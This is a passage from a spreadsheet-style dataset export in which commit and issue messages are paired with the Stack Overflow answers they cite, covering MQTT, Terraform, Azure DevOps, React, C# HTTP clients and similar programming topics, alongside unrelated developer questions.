        android:layout_width=&amp;quot;match_parent&amp;quot;
        android:layout_height=&amp;quot;match_parent&amp;quot; /&amp;gt;
&amp;lt;/LinearLayout&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;item_job.xml&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;
&amp;lt;LinearLayout xmlns:android=&amp;quot;http://schemas.android.com/apk/res/android&amp;quot;
    android:layout_width=&amp;quot;match_parent&amp;quot;
    android:layout_height=&amp;quot;wrap_content&amp;quot;
    android:orientation=&amp;quot;vertical&amp;quot;
    android:padding=&amp;quot;8dp&amp;quot;&amp;gt;
    &amp;lt;ImageView
        android:id=&amp;quot;@+id/jobImage&amp;quot;
        android:layout_width=&amp;quot;match_parent&amp;quot;
        android:layout_height=&amp;quot;200dp&amp;quot;
        android:scaleType=&amp;quot;centerCrop&amp;quot; /&amp;gt;
    &amp;lt;TextView
        android:id=&amp;quot;@+id/jobName&amp;quot;
        android:layout_width=&amp;quot;match_parent&amp;quot;
        android:layout_height=&amp;quot;wrap_content&amp;quot;
        android:text=&amp;quot;Ø§Ø³Ù… Ø§Ù„ÙˆØ¸ÙŠÙØ©&amp;quot;
        android:textSize=&amp;quot;18sp&amp;quot;
        android:textStyle=&amp;quot;bold&amp;quot;
        android:paddingTop=&amp;quot;8dp&amp;quot; /&amp;gt;
    &amp;lt;TextView
        android:id=&amp;quot;@+id/jobDetails&amp;quot;
        android:layout_width=&amp;quot;match_parent&amp;quot;
        android:layout_height=&amp;quot;wrap_content&amp;quot;
        android:text=&amp;quot;ÙˆØµÙ Ø§Ù„ÙˆØ¸ÙŠÙØ©&amp;quot;
        android:textSize=&amp;quot;14sp&amp;quot;
        android:paddingTop=&amp;quot;4dp&amp;quot; /&amp;gt;
&amp;lt;/LinearLayout&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;so please any idea, i need help&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C250</t>
  </si>
  <si>
    <t>MQTT (backend/log): use mosquitto_connect_async()
And call it after mosquito_loop_start()
This enables "graceful" failure when the broker isn't available and its
host is specified as an IP address.
See:
- eclipse/mosquitto#1903
- https://stackoverflow.com/questions/69084846/async-mosquitto-client-trying-to-re-connect-with-mosquitto-broker</t>
  </si>
  <si>
    <t>You don't have to make multiple connection attempts. Your problem is that the first attempt fails for the same reason but does not yet fire any callbacks because the communication thread is not yet started.
If you check the return value of
mosquitto_connect_async
you will see it is
MOSQ_ERR_ERRNO
with
errno
being set to
ECONNREFUSED
(111).
If
mosquitto_loop_start
is called before your first connection attempt, the disconnect callback should be fired - also with
rc == MOSQ_ERR_ERRNO
and
errno == ECONNREFUSED</t>
  </si>
  <si>
    <t xml:space="preserve">How do you manage development and deployment of a n-tier system that's made up of multiple websites, desktop applications, web services and databases that have a mix of dependencies?
Assume that you have a continuous integration environment with source control and automated builds.
</t>
  </si>
  <si>
    <t>C251</t>
  </si>
  <si>
    <t>fix for a broker server-side inflate implemention, for explaination p
lease see http://stackoverflow.com/questions/3932117/handling-http-contentencoding-deflate</t>
  </si>
  <si>
    <t>In HTTP/1.1, Content-encoding: deflate actually refers to the DEFLATE compression algorithm, as defined by RFC 1951, wrapped in the zlib data format, as defined by RFC 1950.
However some vendors just implement the DEFLATE algorithm as defined RFC 1951, completely ignoring RFC 1950 (no zlib headers).
Others have been hit by the same issue:
http://www.mail-archive.com/www-talk@w3.org/msg01000.html
Internet Explorer 8 + Deflate
In order to work around this, try to instantiate the InflaterInputStream passing an Inflater that was created with the nowrap parameter set to true:
in = new InflaterInputStream(conn.getInputStream()), new Inflater(true));</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have integrated Google Drive and Google SignIn into a Flutter app.&lt;/p&gt;
&lt;p&gt;The authentication process relies on the &lt;a href="https://pub.dev/packages/google_sign_in" rel="nofollow noreferrer"&gt;google_sign_in&lt;/a&gt; package maintained by the Flutter team.&lt;/p&gt;
&lt;p&gt;Unfortunately, when using this package for authentication, too much information is requested from the user â€” such as their &lt;code&gt;name&lt;/code&gt;, &lt;code&gt;email&lt;/code&gt; and profile picture â€” even though we only request the &lt;code&gt;DriveApi.driveFileScope&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I don't want users to trust me that I do not process this additional information, I'm looking for a solution to exclude from the authentication process, do you have any leads? Is it even possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C252</t>
  </si>
  <si>
    <t>Allow disabling HTTP TRACE/TRACK verbs (#7907)
### Motivation
*Pulsar broker's embedded Jetty client does not disable HTTP TRACE and TRACK by default which causes the application to be flagged as insecure in certain corporate environments*
### Modifications
*Created a new servlet filter: DisableDebugHttpMethodFilter that is attached to the servlets as they are added at startup. I used [this StackOverflow answer](https://stackoverflow.com/a/40990957)* for reference.</t>
  </si>
  <si>
    <t>You can create a filter:
...
@Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
        HttpServletRequest httpRequest = (HttpServletRequest) request;
        HttpServletResponse httpResponse = (HttpServletResponse) response;
        if ("TRACE".equalsIgnoreCase(httpRequest.getMethod())) {
            httpResponse.setStatus(HttpServletResponse.SC_METHOD_NOT_ALLOWED);
            return;
        }
        chain.doFilter(request, response);
    }
....</t>
  </si>
  <si>
    <t xml:space="preserve">I am just getting started with MVC, and it seems like it will be a great way to go, once I manage to switch my thinking to it.
Most of the material I have come across seems to have a 1-1 relationship between models, views, and tables - ie each model represents a table and allows CRUD, plus more complex functions.
What if I have an Account Model, which would allow account creation and updating.  
I would want to use a /signup view and controller to create() the account, but would want to use a /members/account view and controller to update, change pw, etc.
Would it be better to have a Signup Model, or am I ok with just using whatever model I need from multiple locations?
Also, say an account can have many users, but I want to create the first user at signup.  I would like to run the account setup and user creation as a transaction.  Should I have an Account Model and  User Model, and work with both, or just have the signup create() function for Account create the default user?
I am using PHP with CodeIgniter
</t>
  </si>
  <si>
    <t>C253</t>
  </si>
  <si>
    <t>Fix slow reading from broker by avoiding strands for blocking calls.
If a boost::asio::io_service::strand 'collides' with a strand used here
for the potentially blocking call to asyncConsumeMessage (since MQReceiveMessageWithTimeout is blocking if no messages arrive), this
means that handlers posted to the strand can only be called when the
blocking call has finished.
The timeout in MQReceiveMessageWithTimeout is 100 ms, i.e. if the
m_mqStrand of a JmsConsumer that does not receive any messages collided
with the one of a JmsConsumer receiving messages, the rate that the
latter could digest was limited to 10 Hz maximum.
See http://stackoverflow.com/questions/40291265/boostasio-reasoning-behind-num-implementations-for-io-servicestrand?rq=1 about 'colliding' strands.</t>
  </si>
  <si>
    <t>Well, an interesting issue and +1 for giving us a small example reproducing the exact issue.
The problem you are having 'as I understand' with the boost implementation is that, it by default instantiates only a limited number of strand_impl, 193 as I see in my version of boost (1.59).
Now, what this means is that a large number of requests will be in contention as they would be waiting for the lock to be unlocked by the other handler (using the same instance of strand_impl).
My guess for doing such a thing would be to disallow overloading the OS by creating lots and lots and lots of mutexes. That would be bad. The current implementation allows one to reuse the locks (and in a configurable way as we will see below)
In my setup:
Now, there is a way to change this number of cached implementations by setting the Macro BOOST_ASIO_STRAND_IMPLEMENTATIONS.
Below is the result I got after setting it to a value of 1024:
Almost the same for both cases! You might want to adjust the value of the macro as per your needs to keep the deviation small.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What I'm after is: logging variables, to a text file or CSV, continuously, while my task (main PRG and some sub-FB's) is running, hopefully in a way which doesn't degrade the task performance. So feel free to suggest a different method entirely, or to troubleshoot the below.&lt;/p&gt;
&lt;p&gt;I've looked into OSCAT Network but I couldn't get the libraries to load correctly and more recent Codesys Forge posts suggest CAA File is the more up-to-date, and generic, method for logging. I also tried CmpLog but it was very slow and didn't create an external file.&lt;/p&gt;
&lt;p&gt;What I'm currently testing in:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Codesys V3.5 SP20+.&lt;/li&gt;
&lt;li&gt;Target device is CODESYS_Control_for_Raspberry_Pi_MC_SL, version 4.11.0.0.&lt;/li&gt;
&lt;li&gt;Testing in Simulation mode from a Windows PC, but the instance will eventually run on a Raspberry Pi.&lt;/li&gt;
&lt;li&gt;Using CAA File version 3.5.19.0.&lt;/li&gt;
&lt;li&gt;Single task, Priority 1, Cyclic @ 4 ms. Runs a single PRG.&lt;/li&gt;
&lt;li&gt;The Codesys project is saved under C:\Users\___\Documents to avoid any weirdness with long file names.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The PRG is a (modified for correct function calls) version of CAA's default example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PROGRAM PLC_PRG
VAR
    xFileStdInit: BOOL:=FALSE;
    uiFileStdState: UINT:=0;
    sFileName: FILE.CAA.FILENAME:= 'TestFile.txt';
    hFile: FILE.CAA.HANDLE;
    sFileTestString: STRING:='Hello caa library user';
    sFileString: STRING:='';
    szFileSize1: FILE.CAA.SIZE := 0;
    szFileSize2: FILE.CAA.SIZE := 0;
    filop: FILE.Open;
    filwr: FILE.Write;
    filrd: FILE.Read;
    filcl: FILE.Close;
END_VAR
IF NOT xFileStdInit THEN
    filop(xExecute:=FALSE);
    filcl(xExecute:=FALSE);
    filwr(xExecute:=FALSE);
    filrd(xExecute:=FALSE);
    xFileStdInit:=TRUE;
    uiFileStdState:=0;
ELSE
    CASE uiFileStdState OF
        0: (* create a new file *)
            filop.sFileName:=sFileName;
            filop.eFileMode:=FILE.MODE.MRDWR;
            filop.xExclusive:=TRUE;
            filop( xExecute:=TRUE);
            IF filop.xDone THEN
                hFile:=filop.hFile;
                uiFileStdState:=1;
            END_IF
            IF filop.xError THEN
                (* error handling*)
            ;
            END_IF
        1:(* write text in the file *)
            filwr.hFile:=hFile;
            filwr.pBuffer:=ADR(sFileTestString);
            szFileSize1:=SIZEOF(sFileTestString);
            filwr.szSize:=szFileSize1;
            filwr.udiTimeOut:=100000; (* 100ms Timeout *)
            filwr( xExecute:=TRUE);
            IF filwr.xDone THEN
                uiFileStdState:=2;
            END_IF
            IF filwr.xError THEN
                (* error handling*)
            ;
            END_IF
        2:(* read file - TestFile.txt*)
            filrd.hFile:=hFile;
            filrd.udiTimeOut:=100000; (* 100ms Timeout *)
            filrd.pBuffer:=ADR(sFileString);
            filrd.szBuffer:=255;
            filrd( xExecute:=TRUE);
            IF filrd.xDone THEN
                szFileSize2:=filrd.szSize;
            IF szFileSize2 = szFileSize1 THEN
                uiFileStdState:=3;
            ELSE
            (* error handling*)
            ;
            END_IF
            END_IF
            IF filrd.xError THEN
                (* error handling*)
            ;
            END_IF
        3: (* close file - TestFile.txt *)
            filcl.hFile:=hFile;
            filcl( xExecute:=TRUE);
            IF filcl.xDone THEN
                uiFileStdState:=4;
            END_IF
            IF filcl.xError THEN
                (* error handling*)
            ;
            END_IF
        4: (* end of example *)
            ;
    END_CASE
END_IF
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I run the above in simulation mode, &lt;code&gt;uiFileStdState&lt;/code&gt; begins at 0 and &lt;code&gt;filop xExecute&lt;/code&gt; is TRUE but &lt;code&gt;filop.xDone&lt;/code&gt; is always False. It looks like &lt;code&gt;filop.eError&lt;/code&gt; = &lt;code&gt;ASM_CREATEJOB_FAILED&lt;/code&gt; but I can't figure out why. I tried an absolute location instead of a relative one but that didn't solve the issue.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C254</t>
  </si>
  <si>
    <t>Restrict acess to EKS Control Plane (#101)
* refactor: organize terraform variables
Document which variables are required, optional or operationally impactful
* new: implement cluster_endpoint_public_access_cidrs
- Configure cluster_endpoint_public_access_cidrs to be a terraform variable
- Specify terraform variable in broker specification
- Grab the Host IP of the machine starting the broker to be able to run the tests on github actions
- Default cluster_endpoint_public_access_cidrs to be the cloud.gov egress ranges
* lint: terraform fmt
* fix: also allow internal vpc traffic
Didn't test locally, just hoping it works on github :s
* reimplement: same idea, just implemented better
less error prone.. append internal vpc cide in the code as opposed to as configuration
* fix: try NAT!
okay internal ips can't connect externally, so let's try this instead
* new/fix: IPs for CRDs need to be allowed
This is.. well.. something I don't like
* new: the errors are from EC2 node IPs
There are a lot of IPs in the us-west-2 region and the reason the other tests failed was because the EC2 nodes (where the worker nodes/control plane nodes lived) weren't able to talk itself... this is a blanket to see if it works, but there should be a way to narrow it down... I fear that the EC2 nodes are actually the load balancer nodes which aren't known until the EKS cluster is already up and therefore can't be modified.. this is all speculation...
* new: create additional allowance after lb creation
This breaks a lot of molds around how this is all configured and dependent.  I'm testing whether terraform can figure out dependencies properly before I add any in.  Solution was inspired from: https://stackoverflow.com/questions/56713493/terraform-how-to-get-ip-address-of-aws-lb and validated against these references,</t>
  </si>
  <si>
    <t>Using external provider
Get the NLB IP using Python/boto3 invoking from external provider.
nlb_private_ips.tf
variable "nlb_name" {
}
variable "vpc_id" {
}
variable "region" {
}
data "external" "get_nlb_ips" {
  program = ["python", "${path.module}/get_nlb_private_ips.py"]
  query = {
    aws_nlb_name  = "${var.nlb_name}"
    aws_vpc_id    = "${var.vpc_id}"
    aws_region    = "${var.region}"
  }
}
output "aws_nlb_ip_decoded" {
  value = "${jsondecode(data.external.get_nlb_ips.result.private_ips)}"
}
output "aws_nlb_ip_encoded" {
  value = "${data.external.get_nlb_ips.result.private_ips}"
}
get_nlb_private_ips.py
import boto3
import json
import sys
def json_serial(obj):
    """JSON serializer for objects not serializable by default json code
        Args:
            obj: object to serialize into JSON
    """
    _serialize = {
        "int": lambda o: int(o),
        "float": lambda o: float(o),
        "decimal": lambda o: float(o) if o % 1 &gt; 0 else int(o),
        "date": lambda o: o.isoformat(),
        "datetime": lambda o: o.isoformat(),
        "str": lambda o: o,
    }
    return _serialize[type(obj).__name__.lower()](obj)
def pretty_json(dict):
    """
    Pretty print Python dictionary
    Args:
        dict: Python dictionary
    Returns:
        Pretty JSON
    """
    return json.dumps(dict, indent=2, default=json_serial, sort_keys=True, )
def get_nlb_private_ips(data):
    ec2 = boto3.client('ec2', region_name=data['aws_region'])
    response = ec2.describe_network_interfaces(
        Filters=[
            {
                'Name': 'description',
                'Values': [
                    "ELB net/{AWS_NLB_NAME}/*".format(
                        AWS_NLB_NAME=data['aws_nlb_name'])
                ]
            },
            {
                'Name': 'vpc-id',
                'Values': [
                    data['aws_vpc_id']
                ]
            },
            {
                'Name': 'status',
                'Values': [
                    "in-use"
                ]
            },
            {
                'Name': 'attachment.status',
                'Values': [
                    "attached"
                ]
            }
        ]
    )
    # print(pretty_json(response))
    interfaces = response['NetworkInterfaces']
    # ifs = list(map(lamba index: interfaces[index]['PrivateIpAddresses'], xrange(len(interfaces))))
    # --------------------------------------------------------------------------------
    # Private IP addresses associated to an interface (ENI)
    # Each association has the format:
    #   {
    #     "Association": {
    #       "IpOwnerId": "693054447076",
    #       "PublicDnsName": "ec2-52-88-47-177.us-west-2.compute.amazonaws.com",
    #       "PublicIp": "52.88.47.177"
    #     },
    #     "Primary": true,
    #     "PrivateDnsName": "ip-10-5-1-205.us-west-2.compute.internal",
    #     "PrivateIpAddress": "10.5.1.205"
    #   },
    # --------------------------------------------------------------------------------
    associations = [
        association for interface in interfaces
        for association in interface['PrivateIpAddresses']
    ]
    # --------------------------------------------------------------------------------
    # Get IP from each IP association
    # --------------------------------------------------------------------------------
    private_ips = [
        association['PrivateIpAddress'] for association in associations
    ]
    return private_ips
def load_json():
    data = json.load(sys.stdin)
    return data
def main():
    data = load_json()
    """
    print(data['aws_region'])
    print(data['aws_vpc_id'])
    print(data['aws_nlb_name'])
    """
    ips = get_nlb_private_ips(data)
    print(json.dumps({"private_ips": json.dumps(ips)}))
if __name__ == '__main__':
    main()
Using aws_network_interfaces datasource
After aws_lb has been created.
data "aws_network_interfaces" "this" {
  filter {
    name = "description"
    values = ["ELB net/${aws_lb.this.name}/*"]
  }
  filter {
    name = "vpc-id"
    values = ["${var.vpc_id}"]
  }
  filter {
    name = "status"
    values = ["in-use"]
  }
  filter {
    name = "attachment.status"
    values = ["attached"]
  }
}
locals {
  nlb_interface_ids = "${flatten(["${data.aws_network_interfaces.this.ids}"])}"
}
data "aws_network_interface" "ifs" {
  count = "${length(local.nlb_interface_ids)}"
  id = "${local.nlb_interface_ids[count.index]}"
}
output "aws_lb_network_interface_ips" {
  value = "${flatten([data.aws_network_interface.ifs.*.private_ips])}"
}</t>
  </si>
  <si>
    <t xml:space="preserve">The [external-link] makes me wonder this. 
Does it depends of what is being build ? Do applications (I mean single
        computing program here) have an architecture ? 
UPDATE: to try to clarify the question, I'll give my opinion on the question: I defined the architecture as the cutting of the system in components, and the relationships between the components ;while the design is about the interns of the component. Is this opinion shared  ? 
</t>
  </si>
  <si>
    <t>C255</t>
  </si>
  <si>
    <t>Corrected runOnce strategy example
Corrected output variables schema for runOnce strategy and added an example.
It previously indicated that one should use the `lifecycle-hookname` to access output variables in another job. This is in fact false and the example from [this document](https://docs.microsoft.com/en-us/azure/devops/pipelines/process/variables?view=azure-devops&amp;tabs=yaml%2Cbatch#set-a-multi-job-output-variable) shows the correct implementation.
Ref: https://stackoverflow.com/questions/61476512/azure-devops-pipeline-define-variable-in-deployment-and-reuse-in-subsequent-job/61477357#61477357</t>
  </si>
  <si>
    <t>Edit: The documentation referred to in this question has now been corrected and improved.
I've solved it. The problem is that the documentation
here
specifies this schema for fetching the variable for a
runOnce
deployment:
$[dependencies.&lt;job-name&gt;.outputs['&lt;lifecycle-hookname&gt;.&lt;step-name&gt;.&lt;variable-name&gt;']]
This is in fact
WRONG
. The
&lt;lifecycle-hookname&gt;
parameter should be replaced with the name of the deployment like this:
$[dependencies.&lt;job-name&gt;.outputs['&lt;job-name&gt;.&lt;step-name&gt;.&lt;variable-name&gt;']]
The example from
this documentation
(scroll down a bit) is correct.
A full example pipeline that I've tested and works:
trigger: none
stages:
- stage: X
  jobs:
  - deployment: A # This name is important
    pool:
      vmImage: 'ubuntu-16.04'
    environment: staging
    strategy:
      runOnce:
        deploy:
          steps:
          - script: echo "##vso[task.setvariable variable=myOutputVar;isOutput=true]this is the deployment variable value"
            name: setvarStep # This name is also important
          - script: echo $(setvarStep.myOutputVar)
            name: echovar
  - job: B
    dependsOn: A
    pool:
      vmImage: 'ubuntu-16.04'
    variables:
      myVarFromDeploymentJob: $[ dependencies.A.outputs['A.setvarStep.myOutputVar'] ]
    steps:
    - script: "echo $(myVarFromDeploymentJob)"
      name: echovar</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I came across unexpected aggregation when assigning query result to a variable using CONCAT function (similar behavior with CONCAT_WS).&lt;br&gt;
When I add the declared but not assigned variable to CONCAT, query results are unexpectedly aggregated, instead of assigning simply the value of the last row.&lt;br&gt;
What's going on here?&lt;br&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE #test(val varchar(10))
INSERT INTO #test SELECT * FROM string_split('A|B|C', '|')
DECLARE @str1a nvarchar(4000), @str1b nvarchar(4000), @str2 nvarchar(4000), @str3 nvarchar(4000)
SELECT @str1a = CONCAT(@str1a,  val) FROM #test; PRINT @str1a;
SELECT @str1b = CONCAT(val, @str1b) FROM #test; PRINT @str1b;
SELECT @str2 = CONCAT(NULL,  val) FROM #test; PRINT @str2;
SELECT @str3 = CONCAT('',  val) FROM #test; PRINT @str3;
DROP TABLE #test
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Result:&lt;/p&gt;
(3 rows affected)&lt;br&gt;
ABC&lt;br&gt;
CBA&lt;br&gt;
C&lt;br&gt;
C
</t>
  </si>
  <si>
    <t>C256</t>
  </si>
  <si>
    <t>Future enhancements to DataSourceNode
We decided to just support local file systems for recognizing data sources.
Note that this is missing a few critical items:
add database definitions to include databases
perhaps some fingerprints for the content of the file for easy diffing, like sha256sum--I'm sure there are other more probablistic methods that are less expensive etc. (see https://stackoverflow.com/questions/4927736/how-likely-are-md5-false-positive-checksums for good explanation for collision likelihood).</t>
  </si>
  <si>
    <t>MD5 is a 128 bit cryptographic hash function, so different messages should be distributed pretty well over the 128-bit space.  That would mean that two files (excluding files specifically built to defeat MD5) should have a 1 in 2^128 chance of collision.  In other words, if a pair of files is compared every nanosecond, it wouldn't have happened yet.</t>
  </si>
  <si>
    <t xml:space="preserve">I have an app with the following basic architecture:
A windows service (Service) that registers a .NET type (RemoteObject) for remote access (.NET Remoting). RemoteObject creates non-ThreadPool threads that use the ThreadPool to do IO processing. The size of the ThreadPool must be restricted to a limit  for a particular reason. A GUI app uses .NET Remoting to access RemoteObject. 
I've noticed that if the size of the ThreadPool is too low, the GUI app will hang when making a call to RemoteObject.
My question is, how can I figure out why this is hanging, and why would the RemoteObject thread be affected by the ThreadPool?
This is driving me crazy; thank you for your help!
</t>
  </si>
  <si>
    <t>C257</t>
  </si>
  <si>
    <t>We should not be setting initial state with a prop value, as this can cause issues when modifying props. (Read https://stackoverflow.com/questions/41233458/react-child-component-not-updating-after-parent-state-change for an explanation). Go through the components below and either refactor to remove prop, remove state attribute, or use ComponentWillReceiveProps.
Accordion
Checkbox
Dropdown
Input
Switch
TextArea
TextField
Tooltip</t>
  </si>
  <si>
    <t>There are two issues with your code.
Your child component's initial state is set from props.
this.state = {
  data: props.data
};
Quoting from this
SO Answer
:
Passing the intial state to a component as a
prop
is an anti-pattern
  because the
getInitialState
(in our case the constuctor) method is only called the first time the
  component renders. Never more. Meaning that, if you re-render that
  component passing a
different
value as a
prop
, the component
  will not react accordingly, because the component will keep the state
  from the first time it was rendered. It's very error prone.
So if you can't avoid such a situation the ideal solution is to use the method
componentWillReceiveProps
to listen for new props.
Adding the below code to your child component will solve your problem with Child component re-rendering.
componentWillReceiveProps(nextProps) {
  this.setState({ data: nextProps.data });  
}
The second issue is with the
fetch
.
_makeApiCall(endpoint) {
  fetch(endpoint)
    .then((response) =&gt; response.json())   // ----&gt; you missed this part
    .then((response) =&gt; this.setState({ response }));
}
And here is a working fiddle:
https://jsfiddle.net/o8b04mLy/</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to sync car data from an external API into my WordPress site, which uses the Vehica theme. The API fetch is working (verified in debug.log), but the imported data does not appear in the listing on my site.&lt;/p&gt;
&lt;p&gt;Hereâ€™s how I fetch and insert the data:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Fetching API Data : I retrieve the data using wp_remote_post and parse the JSON response.&lt;/li&gt;
&lt;li&gt;Syncing to WordPress : I create or update posts of type vehica_car, setting metadata, taxonomies, and featured images.&lt;/li&gt;
&lt;li&gt;Debugging : I checked debug.log and confirmed that posts are inserted/updated, I added a function to print available post types (get_post_types()), and vehica_car is liste, I called vehica_sync_products() manually in functions.php, but the data still does not appear in the Vehica listings.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;What could be missing that prevents the imported posts from appearing in Vehicaâ€™s front-end listing?&lt;/p&gt;
&lt;p&gt;Code Snippet:
Hereâ€™s the core part of my sync function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    function vehica_sync_products() {
    require_once(ABSPATH . 'wp-admin/includes/media.php');
    require_once(ABSPATH . 'wp-admin/includes/file.php');
    require_once(ABSPATH . 'wp-admin/includes/image.php');
    $api_products = vehica_fetch_api_products();
    if (!$api_products) {
        error_log('No data received from API');
        return;
    }
    foreach ($api_products as $product) {
        $slug = sanitize_title($product['URL Slug']);
        $existing_post = get_page_by_path($slug, OBJECT, 'vehica_car');
        $post_data = [
            'post_title'   =&amp;gt; sanitize_text_field($product['Title']),
            'post_content' =&amp;gt; wp_kses_post($product['Content'] ?? 'No description available.'),
            'post_type'    =&amp;gt; 'vehica_car',
            'post_status'  =&amp;gt; 'publish',
            'post_name'    =&amp;gt; $slug,
            'meta_input'   =&amp;gt; [
                'vehica_price'       =&amp;gt; floatval($product['Vehica Currency 6656 2384'] ?? 0),
                'vehica_model'       =&amp;gt; sanitize_text_field($product['Model'] ?? ''),
                'vehica_year'        =&amp;gt; intval($product['Tahun'] ?? 2023),
                'vehica_mileage'     =&amp;gt; floatval($product['Jarak Tempuh'] ?? 0),
                'vehica_fuel_type'   =&amp;gt; sanitize_text_field($product['Jenis Bahan Bakar'] ?? ''),
                'vehica_transmission'=&amp;gt; sanitize_text_field($product['Transmisi'] ?? ''),
                'vehica_condition'   =&amp;gt; sanitize_text_field($product['Kondisi'] ?? ''),
            ]
        ];
        if ($existing_post) {
            $post_data['ID'] = $existing_post-&amp;gt;ID;
            $post_id = wp_update_post($post_data, true);
        } else {
            $post_id = wp_insert_post($post_data, true);
        }
        if (!is_wp_error($post_id) &amp;amp;&amp;amp; !empty($product['Galeri'])) {
            $gallery = explode(', ', $product['Galeri']);
            if (!empty($gallery[0])) {
                $image_id = media_sideload_image($gallery[0], $post_id, '', 'id');
                if (!is_wp_error($image_id)) {
                    set_post_thumbnail($post_id, $image_id);
                }
            }
        }
    }
}
// Debugging post types
add_action('init', function() {
    $post_types = get_post_types();
    error_log(print_r($post_types, true)); 
});
// Running sync manually
add_action('init', function() {
    vehica_sync_products();
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Additional Context:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I have enabled debug.log and will provide &lt;a href="https://files.catbox.moe/f9vrci.png" rel="nofollow noreferrer"&gt;screenshots&lt;/a&gt; of the logs.&lt;/li&gt;
&lt;li&gt;The posts are inserted, and they appear in the WordPress admin panel under &amp;quot;Vehica Cars.&amp;quot;&lt;/li&gt;
&lt;li&gt;However, they do not appear on the front-end listing in Vehica.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>C258</t>
  </si>
  <si>
    <t>Plan Inter-Process Communication
Unfortunately, because Monogame applications launch their own exclusive window, and cannot be embedded in other render contexts, such as a WinForms window, our game rendering and GUI work will have to take place in two entirely separate processes at runtime.
This means that we will need to decide on a way to allow data to be communicated between the different processes. Luckily, C# makes this somewhat simple for us by supporting inter-process pipes in the runtime library. However, we also have the option of using networking code to send data over TCP/IP, which is also supported by the C# runtime. This would also open up the ability for the admin simulation to run on a separate computer than the contestant simulations, which would be a limit if we used pipes.
We should discuss the relative pros and cons of each and decide soon how to proceed with this.
Some documentation links:
Named Pipes
https://docs.microsoft.com/en-us/dotnet/standard/io/how-to-use-named-pipes-for-network-interprocess-communication
C# Http GET/POST
https://stackoverflow.com/questions/4015324/how-to-make-http-post-web-request
C# Runtime TCP/IP Sockets
https://www.codeproject.com/Articles/10649/An-Introduction-to-Socket-Programming-in-NET-using
Dedicated Server w/ Multiple Clients (game server-like)
https://github.com/lidgren/lidgren-network-gen3
https://github.com/RevenantX/LiteNetLib</t>
  </si>
  <si>
    <t>There are several ways to perform HTTP
GET
and
POST
requests:
Method A: HttpClient (Preferred)
Available in: .NET Framework 4.5+, .NET Standard 1.1+, and .NET Core 1.0+.
It is currently the preferred approach, and is asynchronous and high performance. Use the built-in version in most cases, but for very old platforms there is a
NuGet package
.
using System.Net.Http;
Setup
It is recommended
to instantiate one
HttpClient
for your application's lifetime and share it unless you have a specific reason not to.
private static readonly HttpClient client = new HttpClient();
See
HttpClientFactory
for a
dependency injection
solution.
POST
var values = new Dictionary&lt;string, string&gt;
  {
      { "thing1", "hello" },
      { "thing2", "world" }
  };
  var content = new FormUrlEncodedContent(values);
  var response = await client.PostAsync("http://www.example.com/recepticle.aspx", content);
  var responseString = await response.Content.ReadAsStringAsync();
GET
var responseString = await client.GetStringAsync("http://www.example.com/recepticle.aspx");
Method B: Third-Party Libraries
RestSharp
POST
var client = new RestClient("http://example.com");
   // client.Authenticator = new HttpBasicAuthenticator(username, password);
   var request = new RestRequest("resource/{id}");
   request.AddParameter("thing1", "Hello");
   request.AddParameter("thing2", "world");
   request.AddHeader("header", "value");
   request.AddFile("file", path);
   var response = client.Post(request);
   var content = response.Content; // Raw content as string
   var response2 = client.Post&lt;Person&gt;(request);
   var name = response2.Data.Name;
Flurl.Http
It is a newer library sporting a
fluent API
, testing helpers, uses HttpClient under the hood, and is portable. It is available via
NuGet
.
using Flurl.Http;
POST
var responseString = await "http://www.example.com/recepticle.aspx"
      .PostUrlEncodedAsync(new { thing1 = "hello", thing2 = "world" })
      .ReceiveString();
GET
var responseString = await "http://www.example.com/recepticle.aspx"
      .GetStringAsync();
Method C: HttpWebRequest (not recommended for new work)
Available in: .NET Framework 1.1+, .NET Standard 2.0+, .NET Core 1.0+. In .NET Core, it is mostly for compatibility -- it wraps
HttpClient
, is less performant, and won't get new features.
using System.Net;
using System.Text;  // For class Encoding
using System.IO;    // For StreamReader
POST
var request = (HttpWebRequest)WebRequest.Create("http://www.example.com/recepticle.aspx");
  var postData = "thing1=" + Uri.EscapeDataString("hello");
      postData += "&amp;thing2=" + Uri.EscapeDataString("world");
  var data = Encoding.ASCII.GetBytes(postData);
  request.Method = "POST";
  request.ContentType = "application/x-www-form-urlencoded";
  request.ContentLength = data.Length;
  using (var stream = request.GetRequestStream())
  {
      stream.Write(data, 0, data.Length);
  }
  var response = (HttpWebResponse)request.GetResponse();
  var responseString = new StreamReader(response.GetResponseStream()).ReadToEnd();
GET
var request = (HttpWebRequest)WebRequest.Create("http://www.example.com/recepticle.aspx");
  var response = (HttpWebResponse)request.GetResponse();
  var responseString = new StreamReader(response.GetResponseStream()).ReadToEnd();
Method D: WebClient (Not recommended for new work)
This is a wrapper around
HttpWebRequest
.
Compare with
HttpClient
.
Available in: .NET Framework 1.1+, NET Standard 2.0+, and .NET Core 2.0+.
In some circumstances (.NET Framework 4.5-4.8), if you need to do a HTTP request synchronously,
WebClient
can still be used.
using System.Net;
using System.Collections.Specialized;
POST
using (var client = new WebClient())
  {
      var values = new NameValueCollection();
